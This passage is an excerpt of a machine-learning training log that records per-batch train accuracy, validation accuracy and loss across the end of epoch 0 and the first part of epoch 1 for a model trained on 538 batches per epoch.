Validation Accuracy: 0.814, Loss: 1.213\nEpoch 0 Batch 450/538 - Train Accuracy: 0.805, Validation Accuracy: 0.819, Loss: 1.184\nEpoch 0 Batch 451/538 - Train Accuracy: 0.802, Validation Accuracy: 0.813, Loss: 1.134\nEpoch 0 Batch 452/538 - Train Accuracy: 0.823, Validation Accuracy: 0.812, Loss: 1.144\nEpoch 0 Batch 453/538 - Train Accuracy: 0.813, Validation Accuracy: 0.801, Loss: 1.150\nEpoch 0 Batch 454/538 - Train Accuracy: 0.814, Validation Accuracy: 0.799, Loss: 1.136\nEpoch 0 Batch 455/538 - Train Accuracy: 0.825, Validation Accuracy: 0.809, Loss: 1.175\nEpoch 0 Batch 456/538 - Train Accuracy: 0.839, Validation Accuracy: 0.814, Loss: 1.146\nEpoch 0 Batch 457/538 - Train Accuracy: 0.812, Validation Accuracy: 0.822, Loss: 1.158\nEpoch 0 Batch 458/538 - Train Accuracy: 0.837, Validation Accuracy: 0.814, Loss: 1.116\nEpoch 0 Batch 459/538 - Train Accuracy: 0.837, Validation Accuracy: 0.808, Loss: 1.168\nEpoch 0 Batch 460/538 - Train Accuracy: 0.812, Validation Accuracy: 0.813, Loss: 1.138\nEpoch 0 Batch 461/538 - Train Accuracy: 0.804, Validation Accuracy: 0.806, Loss: 1.192\nEpoch 0 Batch 462/538 - Train Accuracy: 0.815, Validation Accuracy: 0.819, Loss: 1.117\nEpoch 0 Batch 463/538 - Train Accuracy: 0.798, Validation Accuracy: 0.804, Loss: 1.134\nEpoch 0 Batch 464/538 - Train Accuracy: 0.821, Validation Accuracy: 0.800, Loss: 1.139\nEpoch 0 Batch 465/538 - Train Accuracy: 0.804, Validation Accuracy: 0.807, Loss: 1.106\nEpoch 0 Batch 466/538 - Train Accuracy: 0.813, Validation Accuracy: 0.815, Loss: 1.169\nEpoch 0 Batch 467/538 - Train Accuracy: 0.818, Validation Accuracy: 0.817, Loss: 1.152\nEpoch 0 Batch 468/538 - Train Accuracy: 0.846, Validation Accuracy: 0.815, Loss: 1.124\nEpoch 0 Batch 469/538 - Train Accuracy: 0.819, Validation Accuracy: 0.811, Loss: 1.152\nEpoch 0 Batch 470/538 - Train Accuracy: 0.806, Validation Accuracy: 0.811, Loss: 1.120\nEpoch 0 Batch 471/538 - Train Accuracy: 0.812, Validation Accuracy: 0.805, Loss: 1.138\nEpoch 0 Batch 472/538 - Train Accuracy: 0.857, Validation Accuracy: 0.804, Loss: 1.144\nEpoch 0 Batch 473/538 - Train Accuracy: 0.802, Validation Accuracy: 0.789, Loss: 1.137\nEpoch 0 Batch 474/538 - Train Accuracy: 0.832, Validation Accuracy: 0.789, Loss: 1.142\nEpoch 0 Batch 475/538 - Train Accuracy: 0.834, Validation Accuracy: 0.799, Loss: 1.101\nEpoch 0 Batch 476/538 - Train Accuracy: 0.797, Validation Accuracy: 0.795, Loss: 1.113\nEpoch 0 Batch 477/538 - Train Accuracy: 0.831, Validation Accuracy: 0.799, Loss: 1.126\nEpoch 0 Batch 478/538 - Train Accuracy: 0.825, Validation Accuracy: 0.816, Loss: 1.114\nEpoch 0 Batch 479/538 - Train Accuracy: 0.836, Validation Accuracy: 0.810, Loss: 1.087\nEpoch 0 Batch 480/538 - Train Accuracy: 0.842, Validation Accuracy: 0.813, Loss: 1.126\nEpoch 0 Batch 481/538 - Train Accuracy: 0.849, Validation Accuracy: 0.818, Loss: 1.087\nEpoch 0 Batch 482/538 - Train Accuracy: 0.848, Validation Accuracy: 0.829, Loss: 1.085\nEpoch 0 Batch 483/538 - Train Accuracy: 0.805, Validation Accuracy: 0.813, Loss: 1.170\nEpoch 0 Batch 484/538 - Train Accuracy: 0.842, Validation Accuracy: 0.819, Loss: 1.166\nEpoch 0 Batch 485/538 - Train Accuracy: 0.834, Validation Accuracy: 0.812, Loss: 1.088\nEpoch 0 Batch 486/538 - Train Accuracy: 0.847, Validation Accuracy: 0.815, Loss: 1.129\nEpoch 0 Batch 487/538 - Train Accuracy: 0.847, Validation Accuracy: 0.825, Loss: 1.102\nEpoch 0 Batch 488/538 - Train Accuracy: 0.845, Validation Accuracy: 0.828, Loss: 1.118\nEpoch 0 Batch 489/538 - Train Accuracy: 0.807, Validation Accuracy: 0.831, Loss: 1.073\nEpoch 0 Batch 490/538 - Train Accuracy: 0.836, Validation Accuracy: 0.833, Loss: 1.164\nEpoch 0 Batch 491/538 - Train Accuracy: 0.814, Validation Accuracy: 0.839, Loss: 1.137\nEpoch 0 Batch 492/538 - Train Accuracy: 0.846, Validation Accuracy: 0.846, Loss: 1.094\nEpoch 0 Batch 493/538 - Train Accuracy: 0.823, Validation Accuracy: 0.845, Loss: 1.099\nEpoch 0 Batch 494/538 - Train Accuracy: 0.820, Validation Accuracy: 0.843, Loss: 1.148\nEpoch 0 Batch 495/538 - Train Accuracy: 0.849, Validation Accuracy: 0.845, Loss: 1.142\nEpoch 0 Batch 496/538 - Train Accuracy: 0.849, Validation Accuracy: 0.841, Loss: 1.039\nEpoch 0 Batch 497/538 - Train Accuracy: 0.858, Validation Accuracy: 0.836, Loss: 1.121\nEpoch 0 Batch 498/538 - Train Accuracy: 0.838, Validation Accuracy: 0.816, Loss: 1.107\nEpoch 0 Batch 499/538 - Train Accuracy: 0.855, Validation Accuracy: 0.813, Loss: 1.066\nEpoch 0 Batch 500/538 - Train Accuracy: 0.858, Validation Accuracy: 0.824, Loss: 1.103\nEpoch 0 Batch 501/538 - Train Accuracy: 0.869, Validation Accuracy: 0.839, Loss: 1.117\nEpoch 0 Batch 502/538 - Train Accuracy: 0.833, Validation Accuracy: 0.835, Loss: 1.088\nEpoch 0 Batch 503/538 - Train Accuracy: 0.869, Validation Accuracy: 0.834, Loss: 1.114\nEpoch 0 Batch 504/538 - Train Accuracy: 0.852, Validation Accuracy: 0.839, Loss: 1.142\nEpoch 0 Batch 505/538 - Train Accuracy: 0.855, Validation Accuracy: 0.831, Loss: 1.128\nEpoch 0 Batch 506/538 - Train Accuracy: 0.836, Validation Accuracy: 0.834, Loss: 1.111\nEpoch 0 Batch 507/538 - Train Accuracy: 0.817, Validation Accuracy: 0.839, Loss: 1.131\nEpoch 0 Batch 508/538 - Train Accuracy: 0.851, Validation Accuracy: 0.845, Loss: 1.109\nEpoch 0 Batch 509/538 - Train Accuracy: 0.870, Validation Accuracy: 0.832, Loss: 1.118\nEpoch 0 Batch 510/538 - Train Accuracy: 0.852, Validation Accuracy: 0.845, Loss: 1.062\nEpoch 0 Batch 511/538 - Train Accuracy: 0.836, Validation Accuracy: 0.858, Loss: 1.078\nEpoch 0 Batch 512/538 - Train Accuracy: 0.856, Validation Accuracy: 0.851, Loss: 1.091\nEpoch 0 Batch 513/538 - Train Accuracy: 0.810, Validation Accuracy: 0.835, Loss: 1.152\nEpoch 0 Batch 514/538 - Train Accuracy: 0.843, Validation Accuracy: 0.815, Loss: 1.124\nEpoch 0 Batch 515/538 - Train Accuracy: 0.856, Validation Accuracy: 0.826, Loss: 1.141\nEpoch 0 Batch 516/538 - Train Accuracy: 0.813, Validation Accuracy: 0.831, Loss: 1.117\nEpoch 0 Batch 517/538 - Train Accuracy: 0.848, Validation Accuracy: 0.834, Loss: 1.087\nEpoch 0 Batch 518/538 - Train Accuracy: 0.821, Validation Accuracy: 0.830, Loss: 1.151\nEpoch 0 Batch 519/538 - Train Accuracy: 0.848, Validation Accuracy: 0.841, Loss: 1.064\nEpoch 0 Batch 520/538 - Train Accuracy: 0.834, Validation Accuracy: 0.840, Loss: 1.122\nEpoch 0 Batch 521/538 - Train Accuracy: 0.846, Validation Accuracy: 0.847, Loss: 1.105\nEpoch 0 Batch 522/538 - Train Accuracy: 0.833, Validation Accuracy: 0.847, Loss: 1.094\nEpoch 0 Batch 523/538 - Train Accuracy: 0.824, Validation Accuracy: 0.842, Loss: 1.086\nEpoch 0 Batch 524/538 - Train Accuracy: 0.838, Validation Accuracy: 0.843, Loss: 1.125\nEpoch 0 Batch 525/538 - Train Accuracy: 0.855, Validation Accuracy: 0.854, Loss: 1.110\nEpoch 0 Batch 526/538 - Train Accuracy: 0.841, Validation Accuracy: 0.843, Loss: 1.113\nEpoch 0 Batch 527/538 - Train Accuracy: 0.861, Validation Accuracy: 0.835, Loss: 1.026\nEpoch 0 Batch 528/538 - Train Accuracy: 0.826, Validation Accuracy: 0.839, Loss: 1.107\nEpoch 0 Batch 529/538 - Train Accuracy: 0.831, Validation Accuracy: 0.842, Loss: 1.062\nEpoch 0 Batch 530/538 - Train Accuracy: 0.824, Validation Accuracy: 0.839, Loss: 1.089\nEpoch 0 Batch 531/538 - Train Accuracy: 0.862, Validation Accuracy: 0.835, Loss: 1.126\nEpoch 0 Batch 532/538 - Train Accuracy: 0.846, Validation Accuracy: 0.852, Loss: 1.130\nEpoch 0 Batch 533/538 - Train Accuracy: 0.845, Validation Accuracy: 0.840, Loss: 1.091\nEpoch 0 Batch 534/538 - Train Accuracy: 0.851, Validation Accuracy: 0.847, Loss: 1.076\nEpoch 0 Batch 535/538 - Train Accuracy: 0.861, Validation Accuracy: 0.853, Loss: 1.060\nEpoch 0 Batch 536/538 - Train Accuracy: 0.842, Validation Accuracy: 0.843, Loss: 1.070\nEpoch 1 Batch 0/538 - Train Accuracy: 0.859, Validation Accuracy: 0.859, Loss: 1.076\nEpoch 1 Batch 1/538 - Train Accuracy: 0.862, Validation Accuracy: 0.864, Loss: 1.124\nEpoch 1 Batch 2/538 - Train Accuracy: 0.841, Validation Accuracy: 0.866, Loss: 1.096\nEpoch 1 Batch 3/538 - Train Accuracy: 0.863, Validation Accuracy: 0.860, Loss: 1.047\nEpoch 1 Batch 4/538 - Train Accuracy: 0.854, Validation Accuracy: 0.845, Loss: 1.092\nEpoch 1 Batch 5/538 - Train Accuracy: 0.840, Validation Accuracy: 0.842, Loss: 1.078\nEpoch 1 Batch 6/538 - Train Accuracy: 0.855, Validation Accuracy: 0.831, Loss: 1.100\nEpoch 1 Batch 7/538 - Train Accuracy: 0.854, Validation Accuracy: 0.842, Loss: 1.089\nEpoch 1 Batch 8/538 - Train Accuracy: 0.852, Validation Accuracy: 0.840, Loss: 1.048\nEpoch 1 Batch 9/538 - Train Accuracy: 0.847, Validation Accuracy: 0.833, Loss: 1.116\nEpoch 1 Batch 10/538 - Train Accuracy: 0.848, Validation Accuracy: 0.842, Loss: 1.099\nEpoch 1 Batch 11/538 - Train Accuracy: 0.851, Validation Accuracy: 0.843, Loss: 1.064\nEpoch 1 Batch 12/538 - Train Accuracy: 0.841, Validation Accuracy: 0.843, Loss: 1.036\nEpoch 1 Batch 13/538 - Train Accuracy: 0.879, Validation Accuracy: 0.831, Loss: 1.076\nEpoch 1 Batch 14/538 - Train Accuracy: 0.879, Validation Accuracy: 0.828, Loss: 1.114\nEpoch 1 Batch 15/538 - Train Accuracy: 0.866, Validation Accuracy: 0.848, Loss: 1.072\nEpoch 1 Batch 16/538 - Train Accuracy: 0.860, Validation Accuracy: 0.855, Loss: 1.037\nEpoch 1 Batch 17/538 - Train Accuracy: 0.857, Validation Accuracy: 0.860, Loss: 1.082\nEpoch 1 Batch 18/538 - Train Accuracy: 0.869, Validation Accuracy: 0.864, Loss: 1.106\nEpoch 1 Batch 19/538 - Train Accuracy: 0.852, Validation Accuracy: 0.871, Loss: 1.076\nEpoch 1 Batch 20/538 - Train Accuracy: 0.853, Validation Accuracy: 0.871, Loss: 1.109\nEpoch 1 Batch 21/538 - Train Accuracy: 0.877, Validation Accuracy: 0.870, Loss: 1.063\nEpoch 1 Batch 22/538 - Train Accuracy: 0.844, Validation Accuracy: 0.870, Loss: 1.080\nEpoch 1 Batch 23/538 - Train Accuracy: 0.870, Validation Accuracy: 0.854, Loss: 1.076\nEpoch 1 Batch 24/538 - Train Accuracy: 0.859, Validation Accuracy: 0.833, Loss: 1.094\nEpoch 1 Batch 25/538 - Train Accuracy: 0.857, Validation Accuracy: 0.825, Loss: 1.078\nEpoch 1 Batch 26/538 - Train Accuracy: 0.842, Validation Accuracy: 0.843, Loss: 1.071\nEpoch 1 Batch 27/538 - Train Accuracy: 0.853, Validation Accuracy: 0.837, Loss: 1.076\nEpoch 1 Batch 28/538 - Train Accuracy: 0.865, Validation Accuracy: 0.853, Loss: 1.075\nEpoch 1 Batch 29/538 - Train Accuracy: 0.869, Validation Accuracy: 0.856, Loss: 1.016\nEpoch 1 Batch 30/538 - Train Accuracy: 0.832, Validation Accuracy: 0.861, Loss: 1.086\nEpoch 1 Batch 31/538 - Train Accuracy: 0.871, Validation Accuracy: 0.862, Loss: 0.985\nEpoch 1 Batch 32/538 - Train Accuracy: 0.868, Validation Accuracy: 0.866, Loss: 1.031\nEpoch 1 Batch 33/538 - Train Accuracy: 0.883, Validation Accuracy: 0.868, Loss: 1.047\nEpoch 1 Batch 34/538 - Train Accuracy: 0.858, Validation Accuracy: 0.865, Loss: 1.049\nEpoch 1 Batch 35/538 - Train Accuracy: 0.867, Validation Accuracy: 0.875, Loss: 1.086\nEpoch 1 Batch 36/538 - Train Accuracy: 0.876, Validation Accuracy: 0.861, Loss: 1.046\nEpoch 1 Batch 37/538 - Train Accuracy: 0.868, Validation Accuracy: 0.857, Loss: 1.045\nEpoch 1 Batch 38/538 - Train Accuracy: 0.860, Validation Accuracy: 0.862, Loss: 1.016\nEpoch 1 Batch 39/538 - Train Accuracy: 0.871, Validation Accuracy: 0.871, Loss: 1.064\nEpoch 1 Batch 40/538 - Train Accuracy: 0.876, Validation Accuracy: 0.869, Loss: 1.000\nEpoch 1 Batch 41/538 - Train Accuracy: 0.847, Validation Accuracy: 0.863, Loss: 1.055\nEpoch 1 Batch 42/538 - Train Accuracy: 0.857, Validation Accuracy: 0.866, Loss: 1.054\nEpoch 1 Batch 43/538 - Train Accuracy: 0.839, Validation Accuracy: 0.850, Loss: 1.072\nEpoch 1 Batch 44/538 - Train Accuracy: 0.825, Validation Accuracy: 0.856, Loss: 1.094\nEpoch 1 Batch 45/538 - Train Accuracy: 0.866, Validation Accuracy: 0.860, Loss: 1.032\nEpoch 1 Batch 46/538 - Train Accuracy: 0.888, Validation Accuracy: 0.862, Loss: 1.059\nEpoch 1 Batch 47/538 - Train Accuracy: 0.873, Validation Accuracy: 0.860, Loss: 1.061\nEpoch 1 Batch 48/538 - Train Accuracy: 0.858, Validation Accuracy: 0.862, Loss: 1.026\nEpoch 1 Batch 49/538 - Train Accuracy: 0.868, Validation Accuracy: 0.869, Loss: 1.087\nEpoch 1 Batch 50/538 - Train Accuracy: 0.878, Validation Accuracy: 0.856, Loss: 1.067\nEpoch 1 Batch 51/538 - Train Accuracy: 0.860, Validation Accuracy: 0.848, Loss: 1.038\nEpoch 1 Batch 52/538 - Train Accuracy: 0.862, Validation Accuracy: 0.852, Loss: 1.016\nEpoch 1 Batch 53/538 - Train Accuracy: 0.876, Validation Accuracy: 0.845, Loss: 1.047\nEpoch 1 Batch 54/538 - Train Accuracy: 0.893, Validation Accuracy: 0.853, Loss: 1.037\nEpoch 1 Batch 55/538 - Train Accuracy: 0.864, Validation Accuracy: 0.860, Loss: 1.079\nEpoch 1 Batch 56/538 - Train Accuracy: 0.890, Validation Accuracy: 0.869, Loss: 1.047\nEpoch 1 Batch 57/538 - Train Accuracy: 0.854, Validation Accuracy: 0.874, Loss: 1.068\nEpoch 1 Batch 58/538 - Train Accuracy: 0.854, Validation Accuracy: 0.873, Loss: 1.039\nEpoch 1 Batch 59/538 - Train Accuracy: 0.878, Validation Accuracy: 0.868, Loss: 1.081\nEpoch 1 Batch 60/538 - Train Accuracy: 0.890, Validation Accuracy: 0.867, Loss: 1.075\nEpoch 1 Batch 61/538 - Train Accuracy: 0.877, Validation Accuracy: 0.878, Loss: 1.022\nEpoch 1 Batch 62/538 - Train Accuracy: 0.882, Validation Accuracy: 0.881, Loss: 0.995\nEpoch 1 Batch 63/538 - Train Accuracy: 0.881, Validation Accuracy: 0.887, Loss: 0.997\nEpoch 1 Batch 64/538 - Train Accuracy: 0.883, Validation Accuracy: 0.875, Loss: 1.035\nEpoch 1 Batch 65/538 - Train Accuracy: 0.842, Validation Accuracy: 0.877, Loss: 1.063\nEpoch 1 Batch 66/538 - Train Accuracy: 0.879, Validation Accuracy: 0.869, Loss: 1.015\nEpoch 1 Batch 67/538 - Train Accuracy: 0.893, Validation Accuracy: 0.869, Loss: 1.000\nEpoch 1 Batch 68/538 - Train Accuracy: 0.866, Validation Accuracy: 0.871, Loss: 0.984\nEpoch 1 Batch 69/538 - Train Accuracy: 0.874, Validation Accuracy: 0.869, Loss: 1.024\nEpoch 1 Batch 70/538 - Train Accuracy: 0.875, Validation Accuracy: 0.870, Loss: 1.024\nEpoch 1 Batch 71/538 - Train Accuracy: 0.853, Validation Accuracy: 0.875, Loss: 1.030\nEpoch 1 Batch 72/538 - Train Accuracy: 0.890, Validation Accuracy: 0.873, Loss: 1.093\nEpoch 1 Batch 73/538 - Train Accuracy: 0.861, Validation Accuracy: 0.872, Loss: 1.048\nEpoch 1 Batch 74/538 - Train Accuracy: 0.869, Validation Accuracy: 0.873, Loss: 1.023\nEpoch 1 Batch 75/538 - Train Accuracy: 0.865, Validation Accuracy: 0.872, Loss: 1.004\nEpoch 1 Batch 76/538 - Train Accuracy: 0.876, Validation Accuracy: 0.877, Loss: 1.039\nEpoch 1 Batch 77/538 - Train Accuracy: 0.895, Validation Accuracy: 0.880, Loss: 1.052\nEpoch 1 Batch 78/538 - Train Accuracy: 0.859, Validation Accuracy: 0.877, Loss: 1.040\nEpoch 1 Batch 79/538 - Train Accuracy: 0.896, Validation Accuracy: 0.885, Loss: 1.018\nEpoch 1 Batch 80/538 - Train Accuracy: 0.867, Validation Accuracy: 0.877, Loss: 1.013\nEpoch 1 Batch 81/538 - Train Accuracy: 0.878, Validation Accuracy: 0.879, Loss: 1.037\nEpoch 1 Batch 82/538 - Train Accuracy: 0.868, Validation Accuracy: 0.880, Loss: 1.026\nEpoch 1 Batch 83/538 - Train Accuracy: 0.873, Validation Accuracy: 0.879, Loss: 1.012\nEpoch 1 Batch 84/538 - Train Accuracy: 0.871, Validation Accuracy: 0.882, Loss: 1.046\nEpoch 1 Batch 85/538 - Train Accuracy: 0.890, Validation Accuracy: 0.883, Loss: 1.003\nEpoch 1 Batch 86/538 - Train Accuracy: 0.882, Validation Accuracy: 0.889, Loss: 1.005\nEpoch 1 Batch 87/538 - Train Accuracy: 0.876, Validation Accuracy: 0.889, Loss: 1.050\nEpoch 1 Batch 88/538 - Train Accuracy: 0.890, Validation Accuracy: 0.890, Loss: 1.027\nEpoch 1 Batch 89/538 - Train Accuracy: 0.882, Validation Accuracy: 0.889, Loss: 0.992\nEpoch 1 Batch 90/538 - Train Accuracy: 0.881, Validation Accuracy: 0.886, Loss: 1.041\nEpoch 1 Batch 91/538 - Train Accuracy: 0.874, Validation Accuracy: 0.888, Loss: 1.028\nEpoch 1 Batch 92/538 - Train Accuracy: 0.878, Validation Accuracy: 0.901, Loss: 1.047\nEpoch 1 Batch 93/538 - Train Accuracy: 0.878, Validation Accuracy: 0.897, Loss: 1.021\nEpoch 1 Batch 94/538 - Train Accuracy: 0.889, Validation Accuracy: 0.888, Loss: 1.008\nEpoch 1 Batch 95/538 - Train Accuracy: 0.881, Validation Accuracy: 0.885, Loss: 1.028\nEpoch 1 Batch 96/538 - Train Accuracy: 0.895, Validation Accuracy: 0.889, Loss: 0.976\nEpoch 1 Batch 97/538 - Train Accuracy: 0.899, Validation Accuracy: 0.893, Loss: 0.997\nEpoch 1 Batch 98/538 - Train Accuracy: 0.898, Validation Accuracy: 0.887, Loss: 1.032\nEpoch 1 Batch 99/538 - Train Accuracy: 0.896, Validation Accuracy: 0.887, Loss: 1.047\nEpoch 1 Batch 100/538 - Train Accuracy: 0.886, Validation Accuracy: 0.891, Loss: 1.016\nEpoch 1 Batch 101/538 - Train Accuracy: 0.853, Validation Accuracy: 0.882, Loss: 1.055\nEpoch 1 Batch 102/538 - Train Accuracy: 0.869, Validation Accuracy: 0.866, Loss: 1.027\nEpoch 1 Batch 103/538 - Train Accuracy: 0.895, Validation Accuracy: 0.868, Loss: 1.001\nEpoch 1 Batch 104/538 - Train Accuracy: 0.891, Validation Accuracy: 0.857, Loss: 1.057\nEpoch 1 Batch 105/538 - Train Accuracy: 0.898, Validation Accuracy: 0.877, Loss: 0.994\nEpoch 1 Batch 106/538 - Train Accuracy: 0.864, Validation Accuracy: 0.890, Loss: 1.017\nEpoch 1 Batch 107/538 - Train Accuracy: 0.854, Validation Accuracy: 0.895, Loss: 1.069\nEpoch 1 Batch 108/538 - Train Accuracy: 0.887, Validation Accuracy: 0.893, Loss: 1.036\nEpoch 1 Batch 109/538 - Train Accuracy: 0.911, Validation Accuracy: 0.877, Loss: 1.009\nEpoch 1 Batch 110/538 - Train Accuracy: 0.888, Validation Accuracy: 0.877, Loss: 0.979\nEpoch 1 Batch 111/538 - Train Accuracy: 0.894, Validation Accuracy: 0.886, Loss: 1.045\nEpoch 1 Batch 112/538 - Train Accuracy: 0.894, Validation Accuracy: 0.888, Loss: 1.011\nEpoch 1 Batch 113/538 - Train Accuracy: 0.884, Validation Accuracy: 0.883, Loss: 0.996\nEpoch 1 Batch 114/538 - Train Accuracy: 0.886, Validation Accuracy: 0.883, Loss: 1.004\nEpoch 1 Batch 115/538 - Train Accuracy: 0.887, Validation Accuracy: 0.869, Loss: 0.965\nEpoch 1 Batch 116/538 - Train Accuracy: 0.872, Validation Accuracy: 0.869, Loss: 1.062\nEpoch 1 Batch 117/538 - Train Accuracy: 0.890, Validation Accuracy: 0.874, Loss: 0.989\nEpoch 1 Batch 118/538 - Train Accuracy: 0.894, Validation Accuracy: 0.881, Loss: 0.988\nEpoch 1 Batch 119/538 - Train Accuracy: 0.892, Validation Accuracy: 0.878, Loss: 1.014\nEpoch 1 Batch 120/538 - Train Accuracy: 0.903, Validation Accuracy: 0.880, Loss: 1.011\nEpoch 1 Batch 121/538 - Train Accuracy: 0.890, Validation Accuracy: 0.887, Loss: 1.015\nEpoch 1 Batch 122/538 - Train Accuracy: 0.883, Validation Accuracy: 0.876, Loss: 1.027\nEpoch 1 Batch 123/538 - Train Accuracy: 0.897, Validation Accuracy: 0.878, Loss: 0.978\nEpoch 1 Batch 124/538 - Train Accuracy: 0.880, Validation Accuracy: 0.864, Loss: 1.004\nEpoch 1 Batch 125/538 - Train Accuracy: 0.891, Validation Accuracy: 0.871, Loss: 1.028\nEpoch 1 Batch 126/538 - Train Accuracy: 0.882, Validation Accuracy: 0.876, Loss: 0.972\nEpoch 1 Batch 127/538 - Train Accuracy: 0.872, Validation Accuracy: 0.896, Loss: 0.997\nEpoch 1 Batch 128/538 - Train Accuracy: 0.902, Validation Accuracy: 0.913, Loss: 1.046\nEpoch 1 Batch 129/538 - Train Accuracy: 0.904, Validation Accuracy: 0.913, Loss: 0.956\nEpoch 1 Batch 130/538 - Train Accuracy: 0.889, Validation Accuracy: 0.902, Loss: 0.964\nEpoch 1 Batch 131/538 - Train Accuracy: 0.918, Validation Accuracy: 0.907, Loss: 1.022\nEpoch 1 Batch 132/538 - Train Accuracy: 0.874, Validation Accuracy: 0.903, Loss: 0.972\nEpoch 1 Batch 133/538 - Train Accuracy: 0.886, Validation Accuracy: 0.895, Loss: 0.989\nEpoch 1 Batch 134/538 - Train Accuracy: 0.874, Validation Accuracy: 0.887, Loss: 0.993\nEpoch 1 Batch 135/538 - Train Accuracy: 0.873, Validation Accuracy: 0.873, Loss: 1.015\nEpoch 1 Batch 136/538 - Train Accuracy: 0.888, Validation Accuracy: 0.875, Loss: 1.030\nEpoch 1 Batch 137/538 - Train Accuracy: 0.862, Validation Accuracy: 0.865, Loss: 1.043\nEpoch 1 Batch 138/538 - Train Accuracy: 0.879, Validation Accuracy: 0.863, Loss: 1.015\nEpoch 1 Batch 139/538 - Train Accuracy: 0.871, Validation Accuracy: 0.870, Loss: 1.014\nEpoch 1 Batch 140/538 - Train Accuracy: 0.875, Validation Accuracy: 0.874, Loss: 1.000\nEpoch 1 Batch 141/538 - Train Accuracy: 0.900, Validation Accuracy: 0.881, Loss: 0.999\nEpoch 1 Batch 142/538 - Train Accuracy: 0.904, Validation Accuracy: 0.879, Loss: 0.982\nEpoch 1 Batch 143/538 - Train Accuracy: 0.915, Validation Accuracy: 0.879, Loss: 0.964\nEpoch 1 Batch 144/538 - Train Accuracy: 0.891, Validation Accuracy: 0.881, Loss: 1.006\nEpoch 1 Batch 145/538 - Train Accuracy: 0.877, Validation Accuracy: 0.885, Loss: 1.012\nEpoch 1 Batch 146/538 - Train Accuracy: 0.900, Validation Accuracy: 0.892, Loss: 0.983\nEpoch 1 Batch 147/538 - Train Accuracy: 0.897, Validation Accuracy: 0.889, Loss: 1.011\nEpoch 1 Batch 148/538 - Train Accuracy: 0.875, Validation Accuracy: 0.886, Loss: 1.006\nEpoch 1 Batch 149/538 - Train Accuracy: 0.909, Validation Accuracy: 0.885, Loss: 1.009\nEpoch 1 Batch 150/538 - Train Accuracy: 0.894, Validation Accuracy: 0.885, Loss: 0.997\nEpoch 1 Batch 151/538 - Train Accuracy: 0.911, Validation Accuracy: 0.890, Loss: 0.975\nEpoch 1 Batch 152/538 - Train Accuracy: 0.899, Validation Accuracy: 0.894, Loss: 0.971\nEpoch 1 Batch 153/538 - Train Accuracy: 0.871, Validation Accuracy: 0.887, Loss: 1.019\nEpoch 1 Batch 154/538 - Train Accuracy: 0.895, Validation Accuracy: 0.895, Loss: 0.987\nEpoch 1 Batch 155/538 - Train Accuracy: 0.865, Validation Accuracy: 0.898, Loss: 1.013\nEpoch 1 Batch 156/538 - Train Accuracy: 0.905, Validation Accuracy: 0.902, Loss: 0.985\nEpoch 1 Batch 157/538 - Train Accuracy: 0.906, Validation Accuracy: 0.891, Loss: 1.011\nEpoch 1 Batch 158/538 - Train Accuracy: 0.899, Validation Accuracy: 0.888, Loss: 1.007\nEpoch 1 Batch 159/538 - Train Accuracy: 0.901, Validation Accuracy: 0.878, Loss: 1.015\nEpoch 1 Batch 160/538 - Train Accuracy: 0.884, Validation Accuracy: 0.893, Loss: 0.933\nEpoch 1 Batch 161/538 - Train Accuracy: 0.898, Validation Accuracy: 0.893, Loss: 0.973\nEpoch 1 Batch 162/538 - Train Accuracy: 0.900, Validation Accuracy: 0.887, Loss: 1.016\nEpoch 1 Batch 163/538 - Train Accuracy: 0.910, Validation Accuracy: 0.888, Loss: 1.003\nEpoch 1 Batch 164/538 - Train Accuracy: 0.886, Validation Accuracy: 0.887, Loss: 0.995\nEpoch 1 Batch 165/538 - Train Accuracy: 0.905, Validation Accuracy: 0.887, Loss: 0.997\nEpoch 1 Batch 166/538 - Train Accuracy: 0.904, Validation Accuracy: 0.880, Loss: 0.986\nEpoch 1 Batch 167/538 - Train Accuracy: 0.892, Validation Accuracy: 0.871, Loss: 0.973\nEpoch 1 Batch 168/538 - Train Accuracy: 0.872, Validation Accuracy: 0.865, Loss: 0.974\nEpoch 1 Batch 169/538 - Train Accuracy: 0.912, Validation Accuracy: 0.874, Loss: 0.993\nEpoch 1 Batch 170/538 - Train Accuracy: 0.880, Validation Accuracy: 0.877, Loss: 0.974\nEpoch 1 Batch 171/538 - Train Accuracy: 0.887, Validation Accuracy: 0.882, Loss: 1.011\nEpoch 1 Batch 172/538 - Train Accuracy: 0.887, Validation Accuracy: 0.883, Loss: 0.960\nEpoch 1 Batch 173/538 - Train Accuracy: 0.903, Validation Accuracy: 0.879, Loss: 0.982\nEpoch 1 Batch 174/538 - Train Accuracy: 0.887, Validation Accuracy: 0.873, Loss: 0.996\nEpoch 1 Batch 175/538 - Train Accuracy: 0.908, Validation Accuracy: 0.881, Loss: 0.974\nEpoch 1 Batch 176/538 - Train Accuracy: 0.877, Validation Accuracy: 0.897, Loss: 1.036\nEpoch 1 Batch 177/538 - Train Accuracy: 0.897, Validation Accuracy: 0.894, Loss: 0.990\nEpoch 1 Batch 178/538 - Train Accuracy: 0.875, Validation Accuracy: 0.893, Loss: 0.992\nEpoch 1 Batch 179/538 - Train Accuracy: 0.907, Validation Accuracy: 0.900, Loss: 1.001\nEpoch 1 Batch 180/538 - Train Accuracy: 0.915, Validation Accuracy: 0.898, Loss: 0.963\nEpoch 1 Batch 181/538 - Train Accuracy: 0.879, Validation Accuracy: 0.902, Loss: 0.970\nEpoch 1 Batch 182/538 - Train Accuracy: 0.919, Validation Accuracy: 0.901, Loss: 0.974\nEpoch 1 Batch 183/538 - Train Accuracy: 0.914, Validation Accuracy: 0.889, Loss: 0.965\nEpoch 1 Batch 184/538 - Train Accuracy: 0.901, Validation Accuracy: 0.893, Loss: 0.993\nEpoch 1 Batch 185/538 - Train Accuracy: 0.917, Validation Accuracy: 0.889, Loss: 0.963\nEpoch 1 Batch 186/538 - Train Accuracy: 0.892, Validation Accuracy: 0.884, Loss: 0.992\nEpoch 1 Batch 187/538 - Train Accuracy: 0.905, Validation Accuracy: 0.879, Loss: 0.971\nEpoch 1 Batch 188/538 - Train Accuracy: 0.904, Validation Accuracy: 0.882, Loss: 1.017\nEpoch 1 Batch 189/538 - Train Accuracy: 0.911, Validation Accuracy: 0.875, Loss: 0.996\nEpoch 1 Batch 190/538 - Train Accuracy: 0.896, Validation Accuracy: 0.879, Loss: 1.034\nEpoch 1 Batch 191/538 - Train Accuracy: 0.906, Validation Accuracy: 0.888, Loss: 1.027\nEpoch 1 Batch 192/538 - Train Accuracy: 0.900, Validation Accuracy: 0.893, Loss: 0.986\nEpoch 1 Batch 193/538 - Train Accuracy: 0.900, Validation Accuracy: 0.897, Loss: 0.980\nEpoch 1 Batch 194/538 - Train Accuracy: 0.868, Validation Accuracy: 0.903, Loss: 1.020\nEpoch 1 Batch 195/538 - Train Accuracy: 0.896, 